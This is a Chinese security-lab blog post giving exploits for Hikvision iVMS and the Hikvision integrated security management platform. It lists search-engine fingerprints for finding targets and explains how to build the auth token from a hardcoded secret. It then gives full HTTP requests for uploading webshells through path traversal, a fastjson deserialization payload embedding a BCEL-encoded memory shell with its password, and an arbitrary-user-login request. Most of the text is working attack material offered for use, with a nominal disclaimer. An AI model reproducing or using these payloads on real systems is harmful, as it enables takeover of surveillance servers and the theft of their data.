原创 凯撒安全实验室 凯撒安全实验室
凯撒安全实验室
微信号 SecueKaiser
功能介绍 Secure Kaiser安全团队成立于2021年7月,是一个对网安事业充满热忱和奉献精神的团队,团队致力于红蓝对抗、CTF、漏洞挖掘、渗透测试,在众多国家级、省市级CTF比赛中名列前茅。
__发表于
收录于合集
#海康威视 1 个
#凯撒 2 个
#网络安全 4 个
0x01 阅读须知
凯撒安全实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提供的工具仅用于学习,禁止用于其他!!!
****0x02 漏洞利用
海康威视iVMS 综合安防前台任意文件上传
鹰图指纹:
web.body="/views/home/file/installPackage.rar"
web.icon=="3670cbb1369332b296ce44a94b7dd685"
某康威视iVMS某接口存在任意文件上传漏洞 配合正确的token值可直接获取服务器权限
利用条件:存在任意文件上传接口+token值
漏洞路径
/eps/api/resourceOperations/upload
尝试访问接口:
/eps/api/resourceOperations/upload 发现需要token进行鉴权
token构造:大写
md5(http://url/eps/api/resourceOperations/uploadsecretKeyIbuilding)
构造完token后 可以发现该接口能够正常访问 响应值为200
直接上传蚁剑生成的webshell 响应包200 显示上传附件成功且返回uuid值:
webshell连接地址为:
http://url/eps/upload/uuid的值.jsp
exp来自李师傅
github项目地址:
https://github.com/sccmdaveli/hikvision-poc
综合安防管理平台前台任意文件上传
web.body="综合安防管理平台"
利用难度:低
复现过程:
POST xxxxxxxx HTTP/1.1Host: xxxxxxContent-Length: 249Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close
------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/webapps/els/static/abcd1111.jsp"Content-Type: application/zip
wiki kaisa
------WebKitFormBoundary9PggsiM755PLa54a--
方法2
POST xxxxxxxxxxx HTTP/1.1User-Agent: PostmanRuntime/7.29.2Accept: */*Postman-Token: 1ac225cc-bdbe-4176-b806-a9a7c796ee33Host: xxxxxxConnection: closeContent-Type: multipart/form-data; boundary=--------------------------180188939909122941133151Cookie: JSESSIONID=A0A01DAF36544051C724ABCCB20A0EA6Content-Length: 285
----------------------------180188939909122941133151Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/hello.jsp"Content-Type: application/octet-stream
wiki kaisa
----------------------------180188939909122941133151--
(和方法1不同路由)
POST xxxxxxxxxxxx HTTP/1.1Host: xxxxxPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36Accept: */*Referer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=YWQ2ODliNDYtNjNjOS00YWVlLWI0OTUtOWVmNjc0ZmRkYjIz; CASTGC=TGT-32-1-E511C90CB1B349359F28B9F5FC0EABBC-MsKr7i0M7FQiEahdWtwfezUTFeWB3Dc0IXTaJKf0b2JA5Gon5v-casConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypLDFXMzpLNrJrxRJContent-Length: 210
------WebKitFormBoundarypLDFXMzpLNrJrxRJContent-Disposition: form-data; name="file";filename="../../../tomcat85linux64.1/webapps/issc/static/abcd123.jsp"
wiki kaisa
------WebKitFormBoundarypLDFXMzpLNrJrxRJ--
POST xxxxxxxxxxx HTTP/1.1Host: xxxxxxAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 5424
{"x":{"xxx":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"www":{"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},{"@type":"com.alibaba.fastjson.JSONObject","c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driver":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$95Wkt$Ug$Z$7e$be$cdnf$b2$99$q$bb$9bl$92$J$b4$dc$n$XH$c8$C$B6$UHR$I$91$q$5cB$89$80Z$t$9b$nY$d8$ec$84$d9Y$q$f5B$b5$f5$daj$adw$b0$X$c5K$b4Z$95Z$X$da$K$e2$NmU$b0$8a$b7s$ec$P$fd$e3$P$cf$f1g$8f$f5R$7c$be$d9$d9$9a$rAj$ce$9cy$bf$ef$7d$9f$ef$bd$7d$ef$fb$ee$e4$85W$9f$bd$I$60$z$fe$Q$c4Bd$838$8e$b7$c9$d7$89$m$a6p$8f$8a$b7K$fa$O$F$efT$f1$$$V$tU$dc$ab$e2$ddA$dc$8e$f7$Eq$l$eeW$f1$5e$89$7e$9f$dc$bc_$c1a$b9$f9$80$8a$P$G$d1$82$PI$8d$PH$y9$PJ$fa$e1$m$3e$o7$PI$f1GU$3c$ac$e2c$K$3e$$E$9fP$f0$c9$m$3e$85O$ab$f8$8c$82S$wN$ab$f8$ac$82G$82X$8eG$e5$eb1$f9z$5c$c5$e7$U$7c$5e$c5$Z$V_$u$c3$X$f1$a5$m__V1$ad$e0$x$w$be$aa$e2$J$V_S$f0u$FO$K$94nJ$a6$93$cef$81$92$c6$a6$fd$C$fe$kk$d4$U$a8$eaO$a6$cd$c1$ec$c4$88i$ef3FR$e4D$fa$ad$84$91$dao$d8I$b9$f7$98$7eg$3c$99$R$u$eb$lI$a4$cc$b6$3dS$9d$C$ea$a6D$ca$d3$Y8n$d8$ebc$C$8b$fb$8f$Y$c7$8d$b6$94$91$kk$ebI$Z$99$cc$a0$e5l$b7$b2$e9$d1m$t$S$e6$a4$93$b4$d2$9dyp$acC$40$9f$B$b6$cd$c3$v3$e1$b4mO$9a$a9Q$P$b3$be$5d$60$d1$M$cc$a05$94M$8c$P$98$ce$b85K$df$9av$8f$c6$a4$ff$ff$3d$b3k$e4$I$d5$W$40kHms$d2J$7b$fb$d5$c5$e0$n$c7N$a6$c7$K$kn$f4$e8$G$B$d1$e7$ad$3d$x$b1$98G$d7xt$adG$d7y$9e$f3L4$af8$eb$qSm$5d$b6mL$f5$t3$FGb$eb$3d$ba$3aO$db7$W$3b$b2o$dc6$8dB$g$da$a9$ccO$ea$RB$ebn$ccr$bfe$8c$9av$BO$a5$e1$h$R$F$99$X$40$bb$X$40$bb$X$40$bb$X$40$bb$X$40$3b$af$a7$fa$d0M$3d$a2$fb$e2$a0$40$c5$90c$q$8e$O$Y$93n$8d$u$f8$86$82o$b25X$c2$K$be$c5$Cf$e1$b2dY$7e$C$c1$n$xk$t$cc$edIYK$ca$9e$a9V$a9Z$c3zl$e01$Ng$f1$94$86o$e3i$w$d0$f0$j$3c$zp$9be$8f$b5$g$93Fb$dclMXS$96c$b6$ee5$8fe$cd$8c$d3$97$3eli$c8$e1$9c$c0$c2$5bU$9b$40HBZ$r$a45$l$Do$e6FV$afme$tY$bc75$e9$C$a4$5d$fa$ee$b8G2$g$ce$e3$Z$86$a9$e1Y$3c$c7$der$M$7b$cct4$7c$X$X4$5c$c4$f74$5c$c2$f7yc$e3$8e3$a9$e1$H$f8$a1$86$l$e1$c7l$a0m$e9$d1I$x$99v$96j$b8$8c$9f$u$f8$a9$40$c3$M$c3$8e5$910$9cVY6$adi$a9$f0y$bc$m$d5$b3$fb$96$f2b$834$b2$c3H$8f$a6L$9b$ad$7bC$f8$g$7e$86$9f$7b$n$cf$y$7f$F$bf$d0p$FWi$9d$c7$7bS$d6$88$91$SXp$8b$ce$a2$d51$P$g$9c$b4$ad$84$99$c9X6G$40$f5$iu$ad$e1$97xQ$c3$af$f0k$Z$fc5$82hh$d8$b2$8fr$a8$b8$f9$g4$s$cc$o$cf$f2$bd$c6Yd$9b$c7$98U$c2yy$ac$a1$dfh$f8$z$ee$d6$f0$3b$fc$5e$a0$9c$ec$bdf$86$N$9b$91s$e9$d0$iU$5df$8c$8e$ee0e$f9$d3_$db$ccdS$O$d5e$b2$J$e9o$c1Y$f7$c4$8c$c0$Uo$88$VyTT$k$b3$9a$8b$5dw$93i$c5$3eHdm$dbL$3b$F$N5$8dMs$b5N$94$d1$f4Xi$c7$3c$e1$U$v$d6$8b$e0$c5$N$z$_l$b7$n$95s$9d$o$d7$V$L$yk$9c$3d$b7fi$e1$f9$Q$cf$dfi$sRT1$eay$bb$ea$WGo$i$c5$V$Z$d3$e9r$d3$99$cc$ff$S4$k$94$3f$l$95$d4$5c$d4$3e$fa$iQ$bb$o$ea$u$nX$60y$e3$ec$c9$dc4$d7$b0v$cb$c1$ad$98$e2T$be6$a0$d5$E$f3h$q$d3$cc$c4$bc$99J$7b$c6$N$7bH$f6l$3aav6qD$a92$e7$f9$94U$cfNsg$be$a1vs$8a$Zc$b4$W$z$82xl$82$c2$b3$98$y6$9a1R$Zyh$8e$a8$O$e6$af$$$dfR$C$5b$e7$c8$f9$ecj$9e$eb$W$f2$g$e8C$fd$cddt$r$99$3en$j$a5O$h$e7p$e5$d0$eb$ccy$m$91$b2$d2$b32$fe$9a$d8$9fI$dec$ba$9f$O$7d2$e4$be9A3$f2$d4$c7$3a$l$93$d5$ed$dfw$60$f76$5e$e9q$p$955w$j$W$a8$z$3e$ec$B$3b$b1$I$j$fc$40$92$7f$3e$I$f9$cb$c0$f7F$ee$daH$Fi$a0$f9$i$c4YW$i$e7$bb$d4e$w$e8$e4$5b$cb$D$b0$Jw$90$aa$d8$5c8$i$98$qn$k$8f$f4$9c$87ogs$O$r9$f8$fb$5b$o$81$iJ$87$a7Q6$mY$dc$ab$dc$P$b4D$caH$G$f3$d2$b8$bf$r$S$944$b0$wR$9e$83$W$_$d5K$fd9T$ac$8cT$ca$9d$a2$xr$a7$97RAU$O$a1K$I$e7$9f$b8Z$d2QV$d2$R$8c$Gu$f5$e2$Z$f1$bc$aeF$83$b1x$b9$5e$7eY$9c$d3$a9$u$S$a9$ce$a1$e6$94xBW$e46$U$d7t$ed$b2xD$d7r$88$e6P$h$a9s$a5$Pz$fb$fa$i$f4HC$O$f3N$89$v$97$V$99$_$adW$e8$V$ae$f5$K$c9$L$c5$x$f5J$v$ba$ad$e4$Cn$cfa$81$5e$c9$c5$c2$i$W$c5$abD$3c$a4WI$d9$e2$82$ac$aa$m$LMca$3c$9c$97$$$95J$pz$c4U$g$91$bc$Q$P$G$o$cb$q$3f$ac$87$5d$7eX$P$b9$81$$$97$c8$iV$c8UuIGM$b4FgH$8dgpU$af$8e$d6$e4$d0$U$8f$ea$d1$cbxN$f7G$9a$LV$a3$9e$d5Kh$89$d7$ea$b5$97$f1$a8$5e$cb$ha$3adlx$88$d8$95$d2V$9d$5e$e7$da$aa$d3$a3$d2$87z$bd$5e$ba$b7$caO5$HJ$9eB$eb$90TV$cf$ed$c2$D$r$fe$f3h$h$92$91$e8$ba$$Q$ab$a5$b1Kh$97$Q$bd$Qe$83$de$me$b1$80$ab$n$d22t$c0$cf$97$844$E$5c$z$915$92$b5V$w$g$f6w$94$b1$s$ee$af$R$d3$d7WE$cbN$a1T$ee$82b$fa$d5u$d3$f0$ef$3c$8b$S$WZ5jYt$af$88$88$88b$J$Lk$b3$af$L$eb$u$91$r$f9g$96$j$Q$84$l$e5DV$S$h$s$ba$Ku$Ia$3ewKP$83fD$R$p7Nn7$ea$b1$D$3av$a3$B$fbY$a6G$88$9a$e0$c7$ff$J$y$c0I$f6$c2$c3$ec$89$d3X$cc$af$87$r$fc$f9$5e$8akX$86$97$f8$d9$ff2V$e0$V4$8b$I$da$e8E$8b$a8$c3J$b1$E$abD$TZE$M$ed$a2$T1$d1$855b$Ak$c50$3a$c4$u$d6$8b$Jl$Q66$8a$H$Q$X$8f$a1SLc$93x$Sw$88$i6$8b$3fb$8b$f8$3b$b6$fa$96$a2$cb$b7$C$dd$beft$f8Vc$bbo$jz$7d$hp$bbo3$G$Ye$bf$af$h$bbd$bb$89V$faX$c7v$db$82$ad$f0$d1r$V$ba$YK$84$7e$ccC$P$eeD$98$da$ef$c36$f2$ea$a8$df$c1v$f4$a2$9eV$G$Zm$_t$da$8a$a1$8f$ab$Gz$f38$de$80$9d$a8$a5$7f$X$d0O$5eT$i$e4$H$c0$A$b15$b8$o$8e$d0b7$w$f0$928$c4$y$f52$a7$_$8bn$ec$e1$aa$8aw$b0$F$7b$b9$K1$de$7fc$88$b80$p$fe$x$f6$e1$$$fa2$8c$3f1$a7w1$eb$a7$Z$ef0q$gN$8ag$f0F$i$e0$edL$8a$x8H$h$bc$x_$i$87$c8$e3$Q$f1$c5$f0$s$bc$99$83c$89o$k$de$82$bb9h$9a$7d5x$xW$r$88$f94$Y$5c$f9$R$f7$f91$c2U$A$dd$e2_H$d0n$vv$8b$bfa$94$x$FG$c45$988$cc$n4$n$5e$c4$Y$c6Q$86$q$b5$ff$F$dau$5e$bb$8f$I$FG$n$U$a4$C$d7$e9uy$9e$a1$60b$c6$93v$9f$b0$e0T$bb$ce$7f$e8$c2$ff$T$e3$K$zwg$e5$l$a9$7dr$feuVI$f4$ff$3c$e9$ae$8f$f1$a1$e5$7f$e2$ea$3f$40$l$95$d7$e1c$40$8e$edn$F6$ab$D$ZwF$3b$ff$B$h9$cc$c1K$P$A$A"}}:{}}}
冰蝎内存马:密码:pass123Header: Accept-Agent: css
综合安防前台任意用户登录
鹰图指纹:
web.body="综合安防管理平台"
POST /xxxxxxxxx HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8X-OMC-Mode: embedX-Requested-With: XMLHttpRequestX-Language-Type: zh_CNContent-Length: 110Connection: close
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
会生成personId值:
使用该personid值进行登录 密码默认为null 第一次登录需要自行修改密码:
如有需要poc的师傅可加微信交流,或者公众号后台发送海康威视即可获取方法2 poc
零日/一日 漏洞探讨加 Seven_-0928
本实验室接受正规站点的授权渗透测试服务。如你的公司业务有Web渗透测试,高级渗透测试,红蓝对抗,黑客溯源,Java代码审计等需求可联系以下微信进行商务洽谈:Xud330327
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看